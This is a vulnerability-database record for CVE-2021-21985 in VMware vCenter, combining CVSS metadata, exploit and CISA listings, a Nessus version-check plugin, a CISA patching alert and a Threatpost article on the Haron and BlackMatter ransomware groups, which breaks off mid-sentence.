The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.
{"githubexploit": [{"lastseen": "2021-12-10T15:27:58", "description": "# CVE-2021-21985\nThe vSphere Client (HTML5) contains a remote co...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-27T02:28:48", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21985"], "modified": "2021-05-27T14:19:48", "id": "CF2E9209-48FF-5375-8638-93E7CC964EB3", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-15T21:24:39", "description": "# cve-2021-21985 exploit\n\n## 0x01 \u6f0f\u6d1e\u70b9\n\n![image-20210603144442312...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 
5.9}, "published": "2021-06-03T12:17:06", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21985"], "modified": "2022-08-15T19:04:14", "id": "C1631982-501B-5433-8360-6D33D931706B", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-26T21:20:59", "description": "# CVE-2021-21985 (Vulnerable Code) \n\n", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21985"], "modified": "2021-06-08T00:00:00", "id": "CPAI-2021-0376", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. 
A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "VMware vCenter Server Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21985"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-21985", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-01-10T19:22:13", "description": "The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. 
A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-01T00:00:00", "type": "nessus", "title": "VMWare vCenter Server 6.5 < 6.5 U3p / 6.7 < 6.7 U3n / 7.0 < 7.0 U2b Remote Code Execution", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21985"], "modified": "2022-06-01T00:00:00", "cpe": ["cpe:2.3:a:vmware:vcenter_server:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_113244", "href": "https://www.tenable.com/plugins/was/113244", "sourceData": "No source data", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:50:27", "description": "The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. 
This affects VMware vCenter Server (7.x before 7.0 U2b, 6.7 before 6.7 U3n, and 6.5 before 6.5 U3p) and VMware Cloud Foundation (4.x before 4.2.1 and 3.x before 3.10.2.1).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-03T00:00:00", "type": "nessus", "title": "VMware vCenter Server Virtual SAN Health Check plug-in RCE (CVE-2021-21985) (direct check)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21985"], "modified": "2022-12-06T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_server"], "id": "VMWARE_VCENTER_CVE-2021-21985.NBIN", "href": "https://www.tenable.com/plugins/nessus/150163", "sourceData": "Binary data vmware_vcenter_cve-2021-21985.nbin", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:48:13", "description": "The version of VMware vCenter Server installed on the remote host is 6.5 prior to 6.5 U3p, 6.7 prior to 6.7 U3n or 7.0 prior to 7.0 U2b. 
It is, therefore, affected by multiple vulnerabilities:\n\n - The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. (CVE-2021-21985)\n\n - The vSphere Client (HTML5) contains a vulnerability in a vSphere authentication mechanism for the Virtual SAN Health Check, Site Recovery, vSphere Lifecycle Manager, and VMware Cloud Director Availability plug-ins. A malicious actor with network access to port 443 on vCenter Server may perform actions allowed by the impacted plug-ins without authentication. (CVE-2021-21986)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number. Nessus has also not tested for the presence of a workaround.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-25T00:00:00", "type": "nessus", "title": "VMware vCenter Server 6.5 / 6.7 / 7.0 Multiple Vulnerabilities (VMSA-2021-0010)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": 
"2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21985", "CVE-2021-21986"], "modified": "2022-12-06T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_server"], "id": "VMWARE_VCENTER_VMSA-2021-0010.NASL", "href": "https://www.tenable.com/plugins/nessus/149902", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149902);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2021-21985\", \"CVE-2021-21986\");\n script_xref(name:\"IAVA\", value:\"2021-A-0254\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0027\");\n\n script_name(english:\"VMware vCenter Server 6.5 / 6.7 / 7.0 Multiple Vulnerabilities (VMSA-2021-0010)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A virtualization management application installed on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vCenter Server installed on the remote host is 6.5 prior to 6.5 U3p, 6.7 prior to 6.7 U3n or 7.0\nprior to 7.0 U2b. It is, therefore, affected by multiple vulnerabilities:\n\n - The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the\n Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network\n access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying\n operating system that hosts vCenter Server. 
(CVE-2021-21985)\n\n - The vSphere Client (HTML5) contains a vulnerability in a vSphere authentication mechanism for the Virtual SAN\n Health Check, Site Recovery, vSphere Lifecycle Manager, and VMware Cloud Director Availability plug-ins. A\n malicious actor with network access to port 443 on vCenter Server may perform actions allowed by the impacted\n plug-ins without authentication. (CVE-2021-21986)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber. Nessus has also not tested for the presence of a workaround.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2021-0010.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.vmware.com/vsphere/2021/05/vmsa-2021-0010.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware vCenter Server 6.5 U3p, 6.7 U3n, 7.0 U2b or later or apply the workaround mentioned in the advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21986\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'VMware vCenter Server Virtual SAN Health Check Plugin RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/05/25\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vcenter_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_vcenter_detect.nbin\");\n script_require_keys(\"Host/VMware/vCenter\", \"Host/VMware/version\", \"Host/VMware/release\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\ninclude('vcf_extras.inc');\n\nvar app_info = vcf::vmware_vcenter::get_app_info();\n\nvar constraints = [\n { 'min_version' : '6.5', 'fixed_version' : '6.5.17994927', 'fixed_display' : '6.5 U3p' },\n { 'min_version' : '6.7', 'fixed_version' : '6.7.17713311', 'fixed_display' : '6.7 U3n' },\n { 'min_version' : '7.0', 'fixed_version' : '7.0.17958471', 'fixed_display' : '7.0 U2b' },\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-06-05T18:17:48", "description": "CISA is aware of the likelihood that cyber threat actors are attempting to exploit CVE-2021-21985, a remote code execution vulnerability in VMware vCenter Server and VMware Cloud Foundation. 
Although patches were made [available](<https://www.vmware.com/security/advisories/VMSA-2021-0010.html>) on May 25, 2021, unpatched systems remain an attractive target and attackers can exploit this vulnerability to take control of an unpatched system.\n\nCISA encourages users and administrators to review VMware\u2019s [VMSA-2021-010](<https://www.vmware.com/security/advisories/VMSA-2021-0010.html>), [blogpost](<https://blogs.vmware.com/vsphere/2021/05/vmsa-2021-0010.html>), and [FAQ](<https://core.vmware.com/resource/vmsa-2021-0010-faq>) for more information about the vulnerability and apply the necessary updates as soon as possible, even if out-of-cycle work is required. If an organization cannot immediately apply the updates, then apply the [workarounds](<https://kb.vmware.com/s/article/83829>) in the interim. \n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/06/04/unpatched-vmware-vcenter-software>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-04T00:00:00", "type": "cisa", "title": "Unpatched VMware vCenter Software", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21985"], "modified": "2021-06-04T00:00:00", "id": "CISA:177CDBFAB8460E0C0E46679B383C5C2F", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/06/04/unpatched-vmware-vcenter-software", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-07-29T00:41:11", "description": "So much for darkened servers at the headquarters of [DarkSide](<https://threatpost.com/darksides-servers-shutdown/166187/>) or [REvil](<https://threatpost.com/ransomware-revil-sites-disappears/167745/>) ransomware groups. Turns out, we\u2019ve got either their rebranded versions or two new ransomware gangs to contend with.\n\nThe first new group to appear this month was Haron, and the second is named BlackMatter. As [Ars Technica](<https://arstechnica.com/gadgets/2021/07/july-has-already-brought-us-2-new-ransomware-groups-hunting-for-big-game/?comments=1>)\u2018s Dan Goodin points out, there may be more still out there.\n\nThey\u2019re both claiming to be focused on targets with deep pockets that can pay ransoms in the millions of dollars. 
They\u2019re also virtue-signaling a la DarkSide, with similar language about sparing hospitals, critical infrastructure, nonprofits, etc.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nBlackMatter also promised free decryption if its affiliates screw up and kill kittens or freeze files at, say, pipeline companies, as happened when [Colonial Pipeline was attacked by DarkSide](<https://threatpost.com/colonial-pipeline-ransomware-emergency-declaration/165977/>) in May.\n\n## Haron & Its Cut-and-Paste Ransom Note\n\nThe first sample of the Haron malware was submitted to [VirusTotal](<https://www.virustotal.com/gui/file/6e6b78a1df17d6718daa857827a2a364b7627d9bfd6672406ad72b276014209c/detection>) on July 19. Three days later, the South Korean security firm S2W Lab reported on the group in a [post](<https://medium.com/s2wlab/quick-analysis-of-haron-ransomware-feat-avaddon-and-thanos-1ebb70f64dc4>) that laid out similarities between Haron and Avaddon.\n\nAvaddon is yet another prolific ransomware-as-a-service (RaaS) provider that [evaporated](<https://threatpost.com/avaddon-ransomware-global-crackdowns/166968/>) in June rather than face the legal heat that followed Colonial Pipeline and other big ransomware attacks. At the time, Avaddon [released its decryption keys](<https://www.bleepingcomputer.com/news/security/avaddon-ransomware-shuts-down-and-releases-decryption-keys/>) to BleepingComputer \u2013 2,934 in total \u2013 with each key belonging to an individual victim. According to law enforcement, the average extortion fee Avaddon demanded was about $40,000, meaning the ransomware operators and their affiliates quit and walked away from millions.\n\n## Or Did They?\n\nIn its July 22 post, S2W Lab said that when infected with Haron ransomware, \u201cthe extension of the encrypted file is changed to the victim\u2019s name.\u201d Haron is also similar to Avaddon ransomware in that its operators are using a ransom note and operating their own leak site. 
In its post, S2W provided side-by-side images of ransom notes from the two gangs.\n\nAs you can see below, the two ransom notes read like a cut-and-paste job. S2W Lab noted that the main difference is that Haron suggests a specific ID and Password for victims to log in to the negotiation site.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/28120546/Haron-Avaddon-ransom-notes.png>)\n\nRansom notes from Avaddon and Haron. Source: S2W Lab.\n\nThere are loads of other similarities between Haron and Avaddon, including:\n\n * Yet more cut-and-paste verbiage on the two negotiation sites.\n * Nearly identical appearances of the negotiation sites, besides the ransomware name of \u201cAvaddon\u201d being swapped for \u201cHaron.\u201d\n * Identical chunks of open-source JavaScript code used for chat that was previously published on a Russian developer forum.\n * The two leak sites share the same structure.\n\nIf Haron is Avaddon reborn, the new bottles for the old wine include a strategy to induce negotiations by setting a time for the next data update. Another difference: no [triple-threat play](<https://blogs.blackberry.com/en/2021/06/threat-thursday-avaddon-ransomware-uses-ddos-attacks-as-triple-threat>) to be seen from Haron, at least not yet. In triple-threat attacks, not only is data encrypted locally and exfiltrated before the ransom demand is made, but recalcitrant victims are also subjected to threats of distributed denial-of-service (DDoS) attack until they yield.\n\nAlso, Haron has shrunk the negotiation time to six days, whereas Avaddon allotted 10 days for negotiation. 
Another difference is in the engines running the two ransomwares: S2W Lab said that Haron is running on the [Thanos](<https://threatpost.com/thanos-ransomware-weaponize-riplace-tactic/156438/>) ransomware \u2013 a \u201cRansomware Affiliate Program,\u201d similar to a ransomware-as-a-service (RaaS), that\u2019s been sold since 2019 \u2013 whereas Avaddon was written in C++.\n\nNone of the similarities are solid proof of Avaddon having risen from the ashes like a ransomware phoenix: They could simply point to one or more threat actors from Avaddon working on a reboot, or they could point to nothing at all.\n\n\u201cIt is difficult to conclude that Haron is a re-emergence of Avaddon based on our analysis,\u201d according to S2W\u2019s writeup, which pointed out that \u201cAvaddon developed and used their own C++ based ransomware,\u201d whereas the publicly available Thanos ransomware that Haron is using is based on C#.\n\nSentinelOne\u2019s Jim Walter told Ars that he\u2019s seen what look like similarities between Avaddon and Haron samples, but he\u2019ll know more soon.\n\nAs of July 22, Haron\u2019s leak site had only disclosed one victim.\n\n## BlackMatter\n\nThe second ransomware newbie calls itself BlackMatter. News about the new network was reported on Tuesday by security firm Recorded Future \u2013 which labeled it a [successor to DarkSide and REvil](<https://www.recordedfuture.com/blackmatter-ransomware-successor-darkside-revil/>) \u2013 and by its news arm, [The Record](<https://therecord.media/blackmatter-ransomware-targets-companies-with-revenues-of-100-million-and-more/>). 
Risk intelligence firm Flashpoint also [spotted the newcomer](<https://www.flashpoint-intel.com/blog/chatter-indicates-blackmatter-as-revil-successor/>), noting that BlackMatter registered an account on the Russian-language underground forums XSS and Exploit on July 19 and deposited 4 bitcoins (approximately $150,000 USD as of Wednesday afternoon) into its Exploit escrow account.\n\nBoth of those forums [banned ransomware discussion](<https://threatpost.com/darkside-toshiba-xss-bans-ransomware/166210/>) in May, following DarkSide\u2019s attack on Colonial Pipeline. In the wake of that catastrophic shutdown, which sparked gas hoarding along the East coast and an emergency order from the federal government, REvil instituted pre-moderation for its partner network, saying that it would ban any attempt to attack any government, public, educational or healthcare organizations.\n\nReferring to DarkSide\u2019s experience, REvil\u2019s backers said that the group was \u201cforced to introduce\u201d these \u201csignificant new restrictions,\u201d promising that affiliates that violated the new rules would be kicked out and that it would give out decryption tools for free.\n\nFlashpoint noted that the large deposit on the Exploit forum shows that BlackMatter is serious.\n\nOn July 21, the threat actor said that the network is looking to buy access to affected networks in the U.S., Canada, Australia, and the UK, presumably for ransomware operations. It\u2019s offering up to $100,000 for network access, as well as a cut of the ransom take.\n\n## Putting Up Big Money for Big Fish\n\nBlackMatter is putting up big money because it\u2019s after big fish. The group said that it was looking for deep-pocketed organizations with revenues of more than $100 million: the size of organizations that could be expected to pay big ransoms. The threat actor is also requiring that targets have 500-15,000 hosts in their networks. 
It\u2019s also up for all industries, except for healthcare and governments.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/28133422/BlackMatter-post-on-Exploit-e1627493683950.png>)\n\nBlackMatter ad on the Exploit underground forum. Source: Recorded Future.\n\n## \u2018We Are Ethical Blood Suckers\u2019\n\nThat\u2019s where the virtue signaling comes in. The Record reports that BlackMatter\u2019s leak site is currently empty, which means that BlackMatter only launched this week and hasn\u2019t yet carried out any network penetrations.\n\nWhen it does go after victims, the list won\u2019t include a roster of target types that is currently, supposedly, taboo to target. A section of BlackMatter\u2019s leak site lists the type of targets that are off-limits, including:\n\n * Hospitals\n * Critical infrastructure facilities (nuclear power plants, power plants, water treatment facilities)\n * Oil and gas industry (pipelines, oil refineries)\n * Defense industry\n * Non-profit companies\n * Government sector\n\nSound familiar? That\u2019s because it\u2019s a dead ringer for a list formerly provided on the leak site of the DarkSide gang before it supposedly went belly-up following the Colonial attack. Promises not to attack these types of organizations aren\u2019t always adhered to by these gangs\u2019 affiliates, but BlackMatter has promised that if victims from those industries are attacked, the operators will decrypt their data for free.\n\n## Buying Legitimacy\n\nMike Fowler, vice president of intelligence services at GroupSense \u2013 a firm that offers threat intelligence and [ransom negotiation](<https://threatpost.com/whats-next-revil-victims/167926/>) \u2013 has been keeping an eye on BlackMatter. 
He told Threatpost on Wednesday that lately, there\u2019s been an evolution in tactics, techniques and processes (TTP) used by emerging RaaS cartels such as [Hive](<https://blogs.blackberry.com/en/2021/07/threat-thursday-hive-ransomware>), [Grief](<https://securityaffairs.co/wordpress/118446/cyber-crime/prometheus-grief-ransomware.html>) and, most recently, BlackMatter: an evolution reminiscent of the [2020 shift to double extortion](<https://threatpost.com/double-extortion-ransomware-attacks-spike/154818/>) pioneered by [Maze](<https://threatpost.com/maze-ransomware-cognizant/154957/>).\n\n\u201cGroupSense has witnessed an expected jockeying for position and brand awareness within the RaaS cartels,\u201d Fowler said in an email. \u201cThis was clearly evidenced by BlackMatter\u2019s account registration on the top two cybercrime forums. Their deposit of 4 Bitcoins into their escrow account on the largest Russian cybercrime forum, Exploit, is clearly an attempt to purchase legitimacy.\u201d\n\n## Careful Victim Targeting\n\nDigital Shadows\u2019 Sean Nikkel told Threatpost on Wednesday that the careful selection of big companies reflects the increasing number of threat actors that are \u201cdoing their due diligence\u201d when it comes to selecting victims.\n\n\u201cWe\u2019ve seen time and again when they have some knowledge around key personalities within an organization, revenue, size, and even customers, so the idea of big game hunting seems to be in line with observed ransomware trends,\u201d Nikkel said via email.\n\nHe called the virtue signaling and promise to do right by the exempted industries an \u201cinteresting twist.\u201d\n\n\u201cWhile REvil had publicly stated that everything was fair game previously, maybe this cooling-off period from previous attention has forced a change of heart, if it is indeed them coming back,\u201d Nikkel added.\n\n\u201cInteresting\u201d is one way to frame it. 
Another way to look at it is as squeaking from blood-sucking parasites, as a commenter on Ars\u2019 coverage suggested:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/28095200/nehinks-tick-comment-e1627480332556.jpg>)\n\nNeither was GroupSense\u2019s Fowler impressed by BlackMatter\u2019s \u201cpinky promise\u201d not to victimize certain business segments. He said it rings particularly hollow \u201cgiven their rise to prominence as REvil\u2019s standing as the #2 RaaS fades into obscurity.\u201d\n\nStill, to put it all into perspective, while BlackMatter is \u201cthe flavor of the day,\u201d Fowler says that other RaaS services, such as Conti, Grief, Hive and LockBit, are \u201cjust as big a threat.\u201d\n\n## Ransomware Phoenixes or New Ratbags? Time Will Tell\n\nDirk Schrader, global vice president of security research at New Net Technologies (NNT), told Threatpost on Wednesday that anybody who didn\u2019t see REvil or DarkSide re-emerging might not have their head screwed on right. There\u2019s a \u201cgood chance\u201d that REvil decided proactively \u201cto take down everything and to re-emerge, just to make tracking and tracing even more difficult,\u201d he added in an email.\n\nMeanwhile, whatever sabre-rattling the Biden administration has been doing at Russia or China about kinetic responses and hack-backs won\u2019t change the situation, Schrader predicted. As it is, the threat actors are refining their approaches to look at targets that have \u201ca higher motivation\u201d to pay ransom, cases in point being [Kaseya](<https://threatpost.com/zero-days-kaseya-unitrends-backup-servers/168180/>) and [SolarWinds](<https://threatpost.com/solarwinds-hack-seismic-shift/165758/>).\n\n\u201cRansomware groups will continue to look for attack vectors that 